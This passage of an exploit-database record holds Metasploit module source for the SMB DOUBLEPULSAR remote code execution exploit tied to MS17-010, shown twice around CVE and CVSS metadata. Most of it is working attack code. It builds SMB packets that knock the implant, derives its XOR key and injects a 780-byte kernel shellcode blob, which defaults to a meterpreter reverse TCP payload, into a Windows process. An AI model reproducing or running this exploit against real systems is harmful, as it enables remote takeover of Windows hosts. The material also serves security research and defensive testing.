simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-16] #"}, "lastseen": "2021-10-15T22:16:39", "differentElements": ["sourceData"], "edition": 45}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "1036ec27cd4d48d9ecbdf9f6c3e4b5b1", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-10-16T22:15:48", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-15T22:16:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-15T22:16:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
